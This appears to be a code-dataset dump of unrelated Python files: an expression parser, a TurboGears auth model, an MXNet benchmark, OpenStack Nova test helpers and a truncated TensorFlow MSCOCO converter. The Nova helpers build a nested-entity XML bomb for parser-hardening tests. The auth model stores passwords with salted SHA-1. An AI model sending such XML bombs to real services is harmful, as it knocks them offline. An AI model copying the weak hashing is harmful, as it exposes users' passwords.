gt stringclasses 1
value | context stringlengths 2.49k 119k |
|---|---|
#! /usr/bin/env python3
import sys
import lexer
from tree import Node, CompositeNode
class SymbolDesc:
def __init__(self, symbol, lprio, rprio, evaluator):
self.symbol = symbol
self.lprio = lprio
self.rprio = rprio
self.evaluator = evaluator
def __repr__(self):
return '<Symbol {} {}/{}>'.format(self.symbol, self.lprio, self.rprio)
def identity_evaluator(args):
if len(args) == 1 and type(args[0]) == SymbolDesc:
return Node(args[0].symbol)
else:
return CompositeNode('ID ERROR', args)
def binary_evaluator(args):
if len(args) != 3 or type(args[0]) == SymbolDesc or type(args[1]) != SymbolDesc or type(args[2]) == SymbolDesc:
return CompositeNode('BINARY ERROR', args)
return CompositeNode(args[1].symbol, [args[0], args[2]])
class Parser:
def __init__(self):
self.presymbols = {}
self.presymbols['$soi$'] = SymbolDesc('$soi$', 0, 0, None)
self.postsymbols = {}
self.postsymbols['$soi$'] = SymbolDesc('$soi$', 0, 0, None)
def register_presymbol(self, oper, lprio, rprio, evaluator=None):
if evaluator is None:
evaluator = unary_evaluator
if type(oper) is str:
self.presymbols[oper] = SymbolDesc(oper, lprio, rprio, evaluator)
else:
for op in oper:
self.presymbols[op] = SymbolDesc(op, lprio, rprio, evaluator)
def register_postsymbol(self, oper, lprio, rprio, evaluator=None):
if evaluator is None:
evaluator = binary_evaluator
if type(oper) is str:
self.postsymbols[oper] = SymbolDesc(oper, lprio, rprio, evaluator)
else:
for op in oper:
self.postsymbols[op] = SymbolDesc(op, lprio, rprio, evaluator)
def advance(self):
try:
self.cur_token = self.lexer.__next__()
except StopIteration:
self.cur_token = None
def reset(self, s):
self.lexer = lexer.tokenize(s)
self.advance()
self.stack = [self.presymbols['$soi$']]
def id_symbol(self, id):
return SymbolDesc(id, 999, 1000, identity_evaluator)
def evaluate_handle(self, args):
for i in args:
if type(i) == SymbolDesc:
return i.evaluator(args)
raise RuntimeError('Internal error: no evaluator found in {}'.format(args))
def evaluate(self):
idx = len(self.stack)-1
if type(self.stack[idx]) != SymbolDesc:
idx -= 1
curprio = self.stack[idx].lprio
while type(self.stack[idx-1]) != SymbolDesc or self.stack[idx-1].rprio == curprio:
idx -= 1
if type(self.stack[idx]) == SymbolDesc:
curprio = self.stack[idx].lprio
args = self.stack[idx:]
self.stack[idx:] = []
self.stack.append(self.evaluate_handle(args))
def tos_symbol(self):
idx = len(self.stack)-1
while type(self.stack[idx]) != SymbolDesc:
idx -= 1
return self.stack[idx]
def cur_sym(self, allow_presymbol):
if self.cur_token is None:
return None
elif self.cur_token.kind == 'ID':
return self.id_symbol(self.cur_token)
elif self.cur_token.kind == 'NUMBER':
return self.id_symbol(self.cur_token)
elif allow_presymbol and self.cur_token.lexem in self.presymbols:
return self.presymbols[self.cur_token.lexem]
elif self.cur_token.lexem in self.postsymbols:
return self.postsymbols[self.cur_token.lexem]
else:
return None
def parse(self, s):
self.reset(s)
while True:
sym = self.cur_sym(type(self.stack[-1]) == SymbolDesc)
if sym is None:
break
while self.tos_symbol().rprio > sym.lprio:
self.evaluate()
sym = self.cur_sym(False)
self.stack.append(sym)
self.advance()
while len(self.stack) > 2 or (len(self.stack) == 2 and type(self.stack[-1]) == SymbolDesc):
self.evaluate()
if len(self.stack) == 1:
res = None
elif len(self.stack) == 2:
res = self.stack[1]
if self.cur_token is not None:
res = CompositeNode('REMAINING INPUT', [res, self.cur_token])
return res
def open_parenthesis_evaluator(args):
if (len(args) == 3
and type(args[0]) == SymbolDesc and args[0].symbol == '('
and type(args[1]) != SymbolDesc
and type(args[2]) == SymbolDesc and args[2].symbol == ')'):
return args[1]
elif (len(args) == 3
and type(args[0]) != SymbolDesc
and type(args[1]) == SymbolDesc and args[1].symbol == '('
and type(args[2]) == SymbolDesc and args[2].symbol == ')'):
return CompositeNode('call', [args[0]])
elif (len(args) == 4
and type(args[0]) != SymbolDesc
and type(args[1]) == SymbolDesc and args[1].symbol == '('
and type(args[2]) != SymbolDesc
and type(args[3]) == SymbolDesc and args[3].symbol == ')'):
if args[2].token == ',':
callargs = args[2].children
else:
callargs = [args[2]]
callargs.insert(0, args[0])
return CompositeNode('call', callargs)
else:
return CompositeNode('( ERROR', args)
def close_parenthesis_evaluator(args):
return CompositeNode(') ERROR', args)
def open_bracket_evaluator(args):
if (len(args) == 4
and type(args[0]) != SymbolDesc
and type(args[1]) == SymbolDesc and args[1].symbol == '['
and type(args[2]) != SymbolDesc
and type(args[3]) == SymbolDesc and args[3].symbol == ']'):
return CompositeNode('get', [args[0], args[2]])
else:
return CompositeNode('[ ERROR', args)
def close_bracket_evaluator(args):
return CompositeNode('] ERROR', args)
def coma_evaluator(args):
return CompositeNode(',', [x for x in args if type(x) != SymbolDesc])
def unary_evaluator(args):
if len(args) != 2:
return CompositeNode('UNARY ERROR', args)
if type(args[0]) == SymbolDesc and type(args[1]) != SymbolDesc:
return CompositeNode(args[0].symbol, [args[1]])
elif type(args[0]) != SymbolDesc and type(args[1]) == SymbolDesc:
return CompositeNode('post'+args[1].symbol, [args[0]])
else:
return CompositeNode('UNARY ERROR', args)
def unary_or_binary_evaluator(args):
if (len(args) == 2
and type(args[0]) == SymbolDesc
and type(args[1]) != SymbolDesc):
return CompositeNode(args[0].symbol, [args[1]])
elif (len(args) == 2
and type(args[0]) != SymbolDesc
and type(args[1]) == SymbolDesc):
return CompositeNode('post'+args[1].symbol, [args[0]])
elif (len(args) == 3
and type(args[0]) != SymbolDesc
and type(args[1]) == SymbolDesc
and type(args[2]) != SymbolDesc):
return CompositeNode(args[1].symbol, [args[0], args[2]])
else:
return CompositeNode('1,2-ARY ERROR', args)
def question_evaluator(args):
if (len(args) != 5
or type(args[0]) == SymbolDesc
or type(args[1]) != SymbolDesc or args[1].symbol != '?'
or type(args[2]) == SymbolDesc
or type(args[3]) != SymbolDesc or args[3].symbol != ':'
or type(args[4]) == SymbolDesc):
return CompositeNode('? ERROR', args)
return CompositeNode('?', [args[0], args[2], args[4]])
def colon_evaluator(args):
return CompositeNode(': ERROR', args)
def cexp_parser():
parser = Parser()
parser.register_postsymbol(',', 2, 2, coma_evaluator)
parser.register_postsymbol(['=', '*=', '/=', '%=', '+=', '-=', '<<=', '>>=', '&=', '|=', '^='], 5, 4)
parser.register_postsymbol('?', 7, 1, question_evaluator)
parser.register_postsymbol(':', 1, 6, colon_evaluator)
parser.register_postsymbol('||', 8, 9)
parser.register_postsymbol('&&', 10, 11)
parser.register_postsymbol('|', 12, 13)
parser.register_postsymbol('^', 14, 15)
parser.register_postsymbol('&', 16, 17)
parser.register_postsymbol(['==', '!='], 18, 19)
parser.register_postsymbol(['<', '>', '<=', '>='], 20, 21)
parser.register_postsymbol(['<<', '>>'], 22, 23)
parser.register_postsymbol(['+', '-'], 24, 25)
parser.register_postsymbol(['/', '%', '*'], 26, 27)
parser.register_postsymbol('**', 29, 28)
parser.register_presymbol(['+', '-', '++', '--', '~', '!', '&', '*'], 31, 30, unary_evaluator)
parser.register_postsymbol(['++', '--'], 32, 33, unary_evaluator)
parser.register_postsymbol(['.', '->'], 32, 33)
parser.register_postsymbol('(', 100, 1, open_parenthesis_evaluator)
parser.register_postsymbol(')', 1, 100, close_parenthesis_evaluator)
parser.register_postsymbol('[', 100, 1, open_bracket_evaluator)
parser.register_postsymbol(']', 1, 100, close_bracket_evaluator)
return parser
def main(args):
parser = cexp_parser()
for s in args[1:]:
try:
exp = parser.parse(s)
print('{} -> {}'.format(s, exp))
except RuntimeError as run_error:
print('Unable to parse {}: {}'.format(s, run_error))
if __name__ == "__main__":
main(sys.argv)
| |
# -*- coding: utf-8 -*-
"""
Auth* related model.
This is where the models used by :mod:`repoze.who` and :mod:`repoze.what` are
defined.
It's perfectly fine to re-use this definition in the Brie application,
though.
"""
import os
from datetime import datetime
import sys
try:
from hashlib import sha1
except ImportError:
sys.exit('ImportError: No module named hashlib\n'
'If you are on python2.4 this library is not part of python. '
'Please install it. Example: easy_install hashlib')
from sqlalchemy import Table, ForeignKey, Column
from sqlalchemy.types import Unicode, Integer, DateTime
from sqlalchemy.orm import relation, synonym
from brie.model import DeclarativeBase, metadata, DBSession
__all__ = ['User', 'Group', 'Permission']
#{ Association tables
# This is the association table for the many-to-many relationship between
# groups and permissions. This is required by repoze.what.
group_permission_table = Table('tg_group_permission', metadata,
Column('group_id', Integer, ForeignKey('tg_group.group_id',
onupdate="CASCADE", ondelete="CASCADE")),
Column('permission_id', Integer, ForeignKey('tg_permission.permission_id',
onupdate="CASCADE", ondelete="CASCADE"))
)
# This is the association table for the many-to-many relationship between
# groups and members - this is, the memberships. It's required by repoze.what.
user_group_table = Table('tg_user_group', metadata,
Column('user_id', Integer, ForeignKey('tg_user.user_id',
onupdate="CASCADE", ondelete="CASCADE")),
Column('group_id', Integer, ForeignKey('tg_group.group_id',
onupdate="CASCADE", ondelete="CASCADE"))
)
#{ The auth* model itself
class Group(DeclarativeBase):
"""
Group definition for :mod:`repoze.what`.
Only the ``group_name`` column is required by :mod:`repoze.what`.
"""
__tablename__ = 'tg_group'
#{ Columns
group_id = Column(Integer, autoincrement=True, primary_key=True)
group_name = Column(Unicode(16), unique=True, nullable=False)
display_name = Column(Unicode(255))
created = Column(DateTime, default=datetime.now)
#{ Relations
users = relation('User', secondary=user_group_table, backref='groups')
#{ Special methods
def __repr__(self):
return '<Group: name=%s>' % self.group_name
def __unicode__(self):
return self.group_name
#}
# The 'info' argument we're passing to the email_address and password columns
# contain metadata that Rum (http://python-rum.org/) can use generate an
# admin interface for your models.
class User(DeclarativeBase):
"""
User definition.
This is the user definition used by :mod:`repoze.who`, which requires at
least the ``user_name`` column.
"""
__tablename__ = 'tg_user'
#{ Columns
user_id = Column(Integer, autoincrement=True, primary_key=True)
user_name = Column(Unicode(16), unique=True, nullable=False)
email_address = Column(Unicode(255), unique=True, nullable=False,
info={'rum': {'field':'Email'}})
display_name = Column(Unicode(255))
_password = Column('password', Unicode(80),
info={'rum': {'field':'Password'}})
created = Column(DateTime, default=datetime.now)
#{ Special methods
def __repr__(self):
return '<User: email="%s", display name="%s">' % (
self.email_address, self.display_name)
def __unicode__(self):
return self.display_name or self.user_name
#{ Getters and setters
@property
def permissions(self):
"""Return a set of strings for the permissions granted."""
perms = set()
for g in self.groups:
perms = perms | set(g.permissions)
return perms
@classmethod
def by_email_address(cls, email):
"""Return the user object whose email address is ``email``."""
return DBSession.query(cls).filter(cls.email_address==email).first()
@classmethod
def by_user_name(cls, username):
"""Return the user object whose user name is ``username``."""
return DBSession.query(cls).filter(cls.user_name==username).first()
def _set_password(self, password):
"""Hash ``password`` on the fly and store its hashed version."""
hashed_password = password
if isinstance(password, unicode):
password_8bit = password.encode('UTF-8')
else:
password_8bit = password
salt = sha1()
salt.update(os.urandom(60))
hash = sha1()
hash.update(password_8bit + salt.hexdigest())
hashed_password = salt.hexdigest() + hash.hexdigest()
# Make sure the hashed password is an UTF-8 object at the end of the
# process because SQLAlchemy _wants_ a unicode object for Unicode
# columns
if not isinstance(hashed_password, unicode):
hashed_password = hashed_password.decode('UTF-8')
self._password = hashed_password
def _get_password(self):
"""Return the hashed version of the password."""
return self._password
password = synonym('_password', descriptor=property(_get_password,
_set_password))
#}
def validate_password(self, password):
"""
Check the password against existing credentials.
:param password: the password that was provided by the user to
try and authenticate. This is the clear text version that we will
need to match against the hashed one in the database.
:type password: unicode object.
:return: Whether the password is valid.
:rtype: bool
"""
hashed_pass = sha1()
hashed_pass.update(password + self.password[:40])
return self.password[40:] == hashed_pass.hexdigest()
class Permission(DeclarativeBase):
"""
Permission definition for :mod:`repoze.what`.
Only the ``permission_name`` column is required by :mod:`repoze.what`.
"""
__tablename__ = 'tg_permission'
#{ Columns
permission_id = Column(Integer, autoincrement=True, primary_key=True)
permission_name = Column(Unicode(16), unique=True, nullable=False)
description = Column(Unicode(255))
#{ Relations
groups = relation(Group, secondary=group_permission_table,
backref='permissions')
#{ Special methods
def __repr__(self):
return '<Permission: name=%s>' % self.permission_name
def __unicode__(self):
return self.permission_name
#}
#}
| |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import time
import argparse
import os
import multiprocessing
from mxnet.test_utils import *
MAX_NUM_BATCH = 99999999
COMP = "compute"
COMM = "communication"
IO = "io"
parser = argparse.ArgumentParser(description="Run sparse linear regression " \
"with distributed kvstore",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--profiler', type=int, default=0,
help='whether to use profiler')
parser.add_argument('--num-epoch', type=int, default=1,
help='number of epochs to train')
parser.add_argument('--batch-size', type=int, default=512,
help='number of examples per batch')
parser.add_argument('--num-batch', type=int, default=MAX_NUM_BATCH,
help='number of batches per epoch')
parser.add_argument('--dummy-iter', type=int, default=0,
help='whether to use dummy iterator to exclude io cost')
parser.add_argument('--kvstore', type=str, default=None,
help='what kvstore to use [local, dist_sync, etc]')
parser.add_argument('--sparse-log-level', type=str, default='DEBUG',
help='logging level [DEBUG, INFO, ERROR]')
parser.add_argument('--dataset', type=str, default='avazu',
help='what test dataset to use')
parser.add_argument('--num-gpu', type=int, default=0,
help='number of gpus to use. 0 means using cpu(0);'
'otherwise, use gpu(0),...,gpu(num_gpu-1)')
parser.add_argument('--output-dim', type=int, default=4,
help='number of columns of the forward output')
parser.add_argument('--dummy-metric', type=int, default=0,
help='whether to call update_metric')
parser.add_argument('--enable-logging-for', default="0",
help="Enable logging for the specified list of workers")
parser.add_argument('--measure-only', default=None,
help="Measure only",
choices=[IO, COMP, COMM])
parser.add_argument('--omit-row-sparse-push', action='store_true',
help="omit row_sparse_push")
class DummyIter(mx.io.DataIter):
"A dummy iterator that always return the same batch, used for speed testing"
def __init__(self, real_iter):
super(DummyIter, self).__init__()
self.real_iter = real_iter
self.provide_data = real_iter.provide_data
self.provide_label = real_iter.provide_label
self.batch_size = real_iter.batch_size
for batch in real_iter:
self.the_batch = batch
break
def __iter__(self):
return self
def next(self):
return self.the_batch
# testing dataset sources
avazu = {
'data_name': 'avazu-app.t',
'data_origin_name': 'avazu-app.t.bz2',
'url': "https://www.csie.ntu.edu.tw/~cjlin/libsvmtools/datasets/binary/avazu-app.t.bz2",
'feature_dim': 1000001,
'lc': 1719304,
}
kdda = {
'data_name': 'kdda.t',
'data_origin_name': 'kdda.t.bz2',
'url': "https://www.csie.ntu.edu.tw/~cjlin/libsvmtools/datasets/binary/kdda.t.bz2",
'feature_dim': 20216831,
'lc': 510302,
}
criteo = {
'data_name': 'criteo.t',
'data_origin_name': 'criteo.t.bz2',
'url': "https://s3-us-west-2.amazonaws.com/sparse-dataset/criteo.t.bz2",
'feature_dim': 8388621,
'lc': 548787,
}
datasets = { 'kdda' : kdda, 'avazu' : avazu , 'criteo': criteo }
def get_sym(feature_dim):
inputs = mx.symbol.Variable("data", stype='csr')
norm_init = mx.initializer.Normal(sigma=0.01)
weights = mx.symbol.Variable("w", shape=(feature_dim, args.output_dim),
init=norm_init, stype='row_sparse')
embed = mx.symbol.sparse.dot(inputs, weights)
softmax_output = mx.symbol.Variable("softmax_label")
model = mx.symbol.SoftmaxOutput(data=embed, label=softmax_output, name="out")
return model
def row_sparse_push(kv, param_arrays, grad_arrays, param_names):
for index, pair in enumerate(zip(param_arrays, grad_arrays)):
arg_list, grad_list = pair
if grad_list[0] is None:
continue
name = param_names[index]
kv.push(name, grad_list, priority=-index)
def row_sparse_pull(kv, key, data, slices, weight_array, priority):
# if have kvstore, need to pull corresponding rows of
# the weights to each context
# column indices (NDArray type) of the csr data
# used as the row_idx of the weight row-sparse matrix
row_indices = data.indices
if len(slices) == 1:
kv.row_sparse_pull(key, weight_array, priority=priority, row_ids=row_indices)
else: # more than one slices, multi-GPU training. Need to retain weight rows according to data slices
# TODO(junwu):
# the following line blocks, may need to pre-compute
# and cache it outside the for loop
indptr = data.indptr.asnumpy()
row_idx_array = []
for s in slices:
row_idx_array.append(row_indices[indptr[s.start]:indptr[s.stop]])
kv.row_sparse_pull(key, weight_array, priority=priority, row_ids=row_idx_array)
if __name__ == '__main__':
# arg parser
args = parser.parse_args()
num_epoch = args.num_epoch
num_batch = args.num_batch
kvstore = args.kvstore
profiler = args.profiler > 0
batch_size = args.batch_size if args.num_gpu == 0 else args.num_gpu * args.batch_size
dummy_iter = args.dummy_iter
dataset = args.dataset
log_level = args.sparse_log_level
measure_only = args.measure_only
num_cores = multiprocessing.cpu_count()
omit_row_sparse_push = args.omit_row_sparse_push
if measure_only == COMP or measure_only == IO:
assert not kvstore, "when compute_only or io_only is set, kvstore should be None"
num_batch = datasets[dataset]['lc'] / batch_size if num_batch == MAX_NUM_BATCH else num_batch
if measure_only == COMM:
assert (kvstore == "dist_async"), "when communication_only is set kvstore should be dist_async"
num_batch = datasets[dataset]['lc'] / batch_size if num_batch == MAX_NUM_BATCH else num_batch
contexts = mx.context.cpu(0) if args.num_gpu < 1\
else [mx.context.gpu(i) for i in range(args.num_gpu)]
# create kvstore when there are gpus
kv = mx.kvstore.create(kvstore) if kvstore else None
rank = kv.rank if kv is not None else 0
num_worker = kv.num_workers if kv is not None else 1
# only print log for rank 0 worker
import logging
if log_level == 'ERROR':
log_level = logging.ERROR
elif log_level == 'DEBUG':
log_level = logging.DEBUG
else:
log_level = logging.INFO
# Only log if it is in the list of workers to be logged
logging_workers_list = [int(i) for i in args.enable_logging_for.split(",")]
log_level = log_level if rank in logging_workers_list else logging.CRITICAL
head = '%(asctime)-15s %(message)s'
logging.basicConfig(level=log_level, format=head)
# dataset
assert(dataset in datasets), "unknown dataset " + dataset
metadata = datasets[dataset]
feature_dim = metadata['feature_dim']
if logging:
logging.debug('preparing data ... ')
data_dir = os.path.join(os.getcwd(), 'data')
path = os.path.join(data_dir, metadata['data_name'])
if not os.path.exists(path):
get_bz2_data(data_dir, metadata['data_name'], metadata['url'],
metadata['data_origin_name'])
assert os.path.exists(path)
# data iterator
train_data = mx.io.LibSVMIter(data_libsvm=path, data_shape=(feature_dim,),
batch_size=batch_size, num_parts=num_worker,
part_index=rank)
if dummy_iter or measure_only == COMP or measure_only == COMM:
train_data = DummyIter(train_data)
# model
model = get_sym(feature_dim)
# module
mod = mx.mod.Module(symbol=model, data_names=['data'],
label_names=['softmax_label'], context=contexts)
mod.bind(data_shapes=train_data.provide_data, label_shapes=train_data.provide_label)
mod.init_params(initializer=mx.init.Uniform(scale=.1))
sgd = mx.optimizer.SGD(momentum=0.0, clip_gradient=5.0,
learning_rate=0.1, rescale_grad=1.0/batch_size/num_worker)
mod.init_optimizer(optimizer=sgd, kvstore=kv)
# use accuracy as the metric
metric = mx.metric.create('acc')
index = mod._exec_group.param_names.index('w')
# weight_array bound to executors of the contexts
weight_array = mod._exec_group.param_arrays[index]
mx.nd.waitall() # sync point for initialization
# start profiler
if profiler:
device = 'cpu'
if args.num_gpu > 0:
device = 'gpu' + str(args.num_gpu)
name = 'profile_' + args.dataset + '_' + device + '_nworker' + str(num_worker)\
+ '_batchsize' + str(args.batch_size) + '_outdim' + str(args.output_dim) + '.json'
mx.profiler.set_config(profile_all=True, filename=name)
mx.profiler.set_state('run')
logging.debug('start training ...')
start = time.time()
data_iter = iter(train_data)
time_cost_epoch = 0.
sum_cost_epoch = 0.
average_cost_epoch = 0.
for epoch in range(num_epoch):
start_time_epoch = time.time()
nbatch = 0
end_of_batch = False
metric.reset()
next_batch = next(data_iter)
if kv is not None:
row_sparse_pull(kv, 'w', next_batch.data[0], mod._exec_group.slices, weight_array, -index)
while not end_of_batch:
nbatch += 1
batch = next_batch
if measure_only != IO and measure_only != COMM:
mod.forward_backward(batch)
# update parameters
mod.update()
if measure_only == COMM:
if nbatch == 1:
mod.forward_backward(batch)
mod.update()
elif not omit_row_sparse_push:
row_sparse_push(kv, mod._exec_group.param_arrays, mod._exec_group.grad_arrays, mod._exec_group.param_names)
try:
# pre fetch next batch
next_batch = next(data_iter)
if nbatch == num_batch:
raise StopIteration
if kv is not None:
row_sparse_pull(kv, 'w', next_batch.data[0], mod._exec_group.slices, weight_array, -index)
except StopIteration:
end_of_batch = True
# accumulate prediction accuracy
if args.dummy_metric == 0:
mod.update_metric(metric, batch.label)
else: # call waitall to replace update_metric as sync point
mx.nd.waitall() # sync point for the current minibatch
logging.info('epoch {}, {}'.format(epoch, metric.get()))
end_time_epoch = time.time()
if epoch == 0:
logging.debug("num_batches = {}".format(nbatch))
logging.info('|device|num_worker|average_cost_epoch|rank|')
time_cost_epoch = end_time_epoch - start_time_epoch
if epoch > 0:
sum_cost_epoch = sum_cost_epoch + time_cost_epoch
average_cost_epoch = float(sum_cost_epoch) / epoch
logging.info('num_worker = {}, time cost per epoch = {}'.format(str(num_worker), str(time_cost_epoch)))
if args.num_gpu < 1:
logging.info('|cpu/{} cores| {} | {} | {} |'.format(str(num_cores), str(num_worker), str(average_cost_epoch), rank))
data_iter.reset()
if profiler:
mx.profiler.set_state('stop')
end = time.time()
time_cost = end - start
logging.info('num_worker = {}, rank = {}, time cost = {}'.format(str(num_worker), str(rank), str(time_cost)))
| |
# Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import errno
import platform
import socket
import sys
from oslo.config import cfg
from nova.compute import flavors
import nova.context
import nova.db
from nova import exception
from nova.image import glance
from nova.network import minidns
from nova.network import model as network_model
from nova.objects import instance as instance_obj
CONF = cfg.CONF
CONF.import_opt('use_ipv6', 'nova.netconf')
def get_test_admin_context():
return nova.context.get_admin_context()
def get_test_image_info(context, instance_ref):
if not context:
context = get_test_admin_context()
image_ref = instance_ref['image_ref']
image_service, image_id = glance.get_remote_image_service(context,
image_ref)
return image_service.show(context, image_id)
def get_test_flavor(context=None, options=None):
options = options or {}
if not context:
context = get_test_admin_context()
test_flavor = {'name': 'kinda.big',
'flavorid': 'someid',
'memory_mb': 2048,
'vcpus': 4,
'root_gb': 40,
'ephemeral_gb': 80,
'swap': 1024}
test_flavor.update(options)
try:
flavor_ref = nova.db.flavor_create(context, test_flavor)
except (exception.FlavorExists, exception.FlavorIdExists):
flavor_ref = nova.db.flavor_get_by_name(context, 'kinda.big')
return flavor_ref
def get_test_instance(context=None, flavor=None, obj=False):
if not context:
context = get_test_admin_context()
if not flavor:
flavor = get_test_flavor(context)
metadata = {}
flavors.save_flavor_info(metadata, flavor, '')
test_instance = {'memory_kb': '2048000',
'basepath': '/some/path',
'bridge_name': 'br100',
'vcpus': 4,
'root_gb': 40,
'project_id': 'fake',
'bridge': 'br101',
'image_ref': 'cedef40a-ed67-4d10-800e-17455edce175',
'instance_type_id': '5',
'system_metadata': metadata,
'extra_specs': {},
'user_id': context.user_id,
'project_id': context.project_id,
}
if obj:
instance = instance_obj.Instance(context, **test_instance)
instance.create()
else:
instance = nova.db.instance_create(context, test_instance)
return instance
def get_test_network_info(count=1):
ipv6 = CONF.use_ipv6
fake = 'fake'
fake_ip = '0.0.0.0'
fake_vlan = 100
fake_bridge_interface = 'eth0'
def current():
subnet_4 = network_model.Subnet(cidr=fake_ip,
dns=[network_model.IP(fake_ip),
network_model.IP(fake_ip)],
gateway=network_model.IP(fake_ip),
ips=[network_model.IP(fake_ip),
network_model.IP(fake_ip)],
routes=None,
dhcp_server=fake_ip)
subnet_6 = network_model.Subnet(cidr=fake_ip,
gateway=network_model.IP(fake_ip),
ips=[network_model.IP(fake_ip),
network_model.IP(fake_ip),
network_model.IP(fake_ip)],
routes=None,
version=6)
subnets = [subnet_4]
if ipv6:
subnets.append(subnet_6)
network = network_model.Network(id=None,
bridge=fake,
label=None,
subnets=subnets,
vlan=fake_vlan,
bridge_interface=fake_bridge_interface,
injected=False)
vif = network_model.VIF(id='vif-xxx-yyy-zzz',
address=fake,
network=network,
type=network_model.VIF_TYPE_BRIDGE,
devname=None,
ovs_interfaceid=None)
return vif
return network_model.NetworkInfo([current() for x in xrange(0, count)])
def is_osx():
return platform.mac_ver()[0] != ''
test_dns_managers = []
def dns_manager():
global test_dns_managers
manager = minidns.MiniDNS()
test_dns_managers.append(manager)
return manager
def cleanup_dns_managers():
global test_dns_managers
for manager in test_dns_managers:
manager.delete_dns_file()
test_dns_managers = []
def killer_xml_body():
return (("""<!DOCTYPE x [
<!ENTITY a "%(a)s">
<!ENTITY b "%(b)s">
<!ENTITY c "%(c)s">]>
<foo>
<bar>
<v1>%(d)s</v1>
</bar>
</foo>""") % {
'a': 'A' * 10,
'b': '&a;' * 10,
'c': '&b;' * 10,
'd': '&c;' * 9999,
}).strip()
def is_ipv6_supported():
has_ipv6_support = socket.has_ipv6
try:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
s.close()
except socket.error as e:
if e.errno == errno.EAFNOSUPPORT:
has_ipv6_support = False
else:
raise
# check if there is at least one interface with ipv6
if has_ipv6_support and sys.platform.startswith('linux'):
try:
with open('/proc/net/if_inet6') as f:
if not f.read():
has_ipv6_support = False
except IOError:
has_ipv6_support = False
return has_ipv6_support
def get_api_version(request):
if request.path[2:3].isdigit():
return int(request.path[2:3])
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts MSCOCO data to TFRecord file format with SequenceExample protos.
The MSCOCO images are expected to reside in JPEG files located in the following
directory structure:
train_image_dir/COCO_train2014_000000000151.jpg
train_image_dir/COCO_train2014_000000000260.jpg
...
and
val_image_dir/COCO_val2014_000000000042.jpg
val_image_dir/COCO_val2014_000000000073.jpg
...
The MSCOCO annotations JSON files are expected to reside in train_captions_file
and val_captions_file respectively.
This script converts the combined MSCOCO data into sharded data files consisting
of 256, 4 and 8 TFRecord files, respectively:
output_dir/train-00000-of-00256
output_dir/train-00001-of-00256
...
output_dir/train-00255-of-00256
and
output_dir/val-00000-of-00004
...
output_dir/val-00003-of-00004
and
output_dir/test-00000-of-00008
...
output_dir/test-00007-of-00008
Each TFRecord file contains ~2300 records. Each record within the TFRecord file
is a serialized SequenceExample proto consisting of precisely one image-caption
pair. Note that each image has multiple captions (usually 5) and therefore each
image is replicated multiple times in the TFRecord files.
The SequenceExample proto contains the following fields:
context:
image/image_id: integer MSCOCO image identifier
image/data: string containing JPEG encoded image in RGB colorspace
feature_lists:
image/caption: list of strings containing the (tokenized) caption words
image/caption_ids: list of integer ids corresponding to the caption words
The captions are tokenized using the NLTK (http://www.nltk.org/) word tokenizer.
The vocabulary of word identifiers is constructed from the sorted list (by
descending frequency) of word tokens in the training set. Only tokens appearing
at least 4 times are considered; all other words get the "unknown" word id.
NOTE: This script will consume around 100GB of disk space because each image
in the MSCOCO dataset is replicated ~5 times (once per caption) in the output.
This is done for two reasons:
1. In order to better shuffle the training data.
2. It makes it easier to perform asynchronous preprocessing of each image in
TensorFlow.
Running this script using 16 threads may take around 1 hour on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import Counter
from collections import namedtuple
from datetime import datetime
import json
import os.path
import random
import sys
import threading
import nltk.tokenize
import numpy as np
import tensorflow as tf
tf.flags.DEFINE_string("train_image_dir", "/tmp/train2014/",
"Training image directory.")
tf.flags.DEFINE_string("val_image_dir", "/tmp/val2014",
"Validation image directory.")
tf.flags.DEFINE_string("train_captions_file", "/tmp/captions_train2014.json",
"Training captions JSON file.")
tf.flags.DEFINE_string("val_captions_file", "/tmp/captions_val2014.json",
"Validation captions JSON file.")
tf.flags.DEFINE_string("output_dir", "/tmp/", "Output data directory.")
tf.flags.DEFINE_integer("train_shards", 256,
"Number of shards in training TFRecord files.")
tf.flags.DEFINE_integer("val_shards", 4,
"Number of shards in validation TFRecord files.")
tf.flags.DEFINE_integer("test_shards", 8,
"Number of shards in testing TFRecord files.")
tf.flags.DEFINE_string("start_word", "<S>",
"Special word added to the beginning of each sentence.")
tf.flags.DEFINE_string("end_word", "</S>",
"Special word added to the end of each sentence.")
tf.flags.DEFINE_string("unknown_word", "<UNK>",
"Special word meaning 'unknown'.")
tf.flags.DEFINE_integer("min_word_count", 4,
"The minimum number of occurrences of each word in the "
"training set for inclusion in the vocabulary.")
tf.flags.DEFINE_string("word_counts_output_file", "/tmp/word_counts.txt",
"Output vocabulary file of word counts.")
tf.flags.DEFINE_integer("num_threads", 8,
"Number of threads to preprocess the images.")
FLAGS = tf.flags.FLAGS
ImageMetadata = namedtuple("ImageMetadata",
["image_id", "filename", "captions"])
class Vocabulary(object):
"""Simple vocabulary wrapper."""
def __init__(self, vocab, unk_id):
"""Initializes the vocabulary.
Args:
vocab: A dictionary of word to word_id.
unk_id: Id of the special 'unknown' word.
"""
self._vocab = vocab
self._unk_id = unk_id
def word_to_id(self, word):
"""Returns the integer id of a word string."""
